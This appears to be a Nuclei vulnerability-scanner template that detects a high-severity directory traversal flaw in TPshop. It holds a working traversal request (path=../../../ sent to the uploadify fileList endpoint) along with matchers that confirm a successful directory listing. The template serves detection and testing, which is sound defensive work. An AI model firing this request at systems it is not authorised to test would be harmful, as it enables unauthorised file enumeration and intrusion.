id: tpshop-directory-traversal

info:
  name: TPshop - Local File Inclusion
  author: pikpikcu
  description: TPshop is vulnerable to local file inclusion.
  severity: high
  reference:
    - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: tpshop,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '"state":"SUCCESS"'

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/04
